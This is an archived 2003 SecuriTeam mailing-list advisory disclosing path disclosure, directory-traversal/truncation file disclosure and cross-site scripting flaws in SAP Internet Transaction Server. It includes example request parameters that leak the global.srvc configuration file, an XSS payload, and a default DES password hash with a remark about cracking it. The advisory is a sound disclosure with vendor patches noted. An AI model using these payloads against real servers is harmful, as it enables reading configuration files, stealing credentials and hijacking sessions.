[NEWS] SAP Internet Transaction Server Multiple Vulnerabilities

From: SecuriTeam (support_at_securiteam.com)
Date: 09/02/03

  • Next message: SecuriTeam: "[NT] Accessibility Control Bypass Vulnerability of Wrapsody Viewer"
    To: list@securiteam.com
    Date: 2 Sep 2003 15:37:11 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      SAP Internet Transaction Server Multiple Vulnerabilities
    ------------------------------------------------------------------------

    SUMMARY

    The ITS product has been found to contain the following vulnerabilities:
     - Path/Information Disclosure
     - Directory Traversal
     - Filename Truncation
     - Arbitrary File Disclosure
     - Cross Site Scripting/Cookie Theft

    DETAILS

    Vulnerable systems:
     * ITS version 4620.2.0.323011 build 46B.323011

    Path/information disclosure:
    Insufficient input and output validation on miscellaneous user provided
    input allow the insertion of non-existing values for the following user
    supplied parameters:
    ~service
    ~templatelanguage
    ~language
    ~theme
    ~template

    Thus leading to several unwanted error messages that may include sensitive
    information on operating system, software version and the directory
    structure of the attacked server.

    Example:
    http://www.server.name/scripts/wgate/pbw2/!?

    With the following parameters:
    ~runtimemode=DM&
    ~language=en&
    ~theme=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&

    Remarks:
    It might be possible that "~template" is an undocumented or forgotten
    variable.

    Arbitrary file disclosure (Directory Traversal / File Truncation):
    Example:
    http://www.server.name/scripts/wgate/pbw2/!?

    With the following parameters:
    ~language=en&
    ~runtimemode=DM&
    ~templatelanguage=&
    ~language=en&
    ~theme=..\..&
    ~template=services\global.srvc++++++++++++++++++++++++++++++++++++++++++++++++++++++
    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    +++++++++++++++++++++++++++++++++++++++++++++++++++

    (Where "+" stands for spaces "%20" URI encoded).
    The above example will cause the server to respond with the global server
    configuration file "global.srvc" on an ITS default-installation.

    Normally the default-template extension is concatenated to the rest of the
    template information. Most probably, somebody wanted to avoid a possible
    buffer overflow by truncating the input values if they exceed a given
    length. Thus making it possible to shed the ".html" extension.

    For some strange reason now and then, the program responds with an
    error-message instead of giving out the requested file. This might be due
    to unwanted?/additional? HTTP-Request-Header information.

    Remarks:
    The global configuration file "global.srvc" contains username and
    des-encrypted password
    ~password des26(2c94f116f4393f3d)
    ~login Master

    A good DES-cracker should be able to crack this password-hash either by
    using wordlists or by brute-force methods.

    Cross Site Scripting/Cookie Theft:
    Insufficient input and output validation on miscellaneous user input
    parameters enables insertion of HTML/client side scripting tags.

    Example:
    http://www.server.name/scripts/wgate.dll?

    With the following parameters:
    ~service=--><img%09src=javascript:alert(1)%3bcrap

    Remarks:
    Due to excessive usage of cookies for managing sessions and/or states,
    cookie-theft is very likely. There might be several other locations where
    HTML/scripting tags can be inserted.

    Vendor Status:
    The vendor has been contacted on 02.08.2003, and has issued patches.

    Vendor Patches:
    SAP recommends looking into advice 598074, 595383, and 654038.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:martin@websec.org> Martin
    Eiszner of SEC-CONSULT.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] Accessibility Control Bypass Vulnerability of Wrapsody Viewer"

    Relevant Pages

    • [TOOL] TCP/UDP Protocol Fuzzer (CIRT.DK)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Making the template: ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [NEWS] Barracuda Spam Firewall Arbitrary File Disclosure
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Barracuda Spam Firewall Arbitrary File Disclosure ... Barracuda Spam Firewalls from version 3.3.01.001 to 3.3.02.053 ... Vulnerability" guest password vulnerability this ...
      (Securiteam)
    • [NEWS] IP3 NetAccess Arbitrary File Disclosure
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... IP3 NetAccess Arbitrary File Disclosure ... An arbitrary file disclosure vulnerability in IP3 NetAccess leads to full ... all NetAccess devices with a firmware ...
      (Securiteam)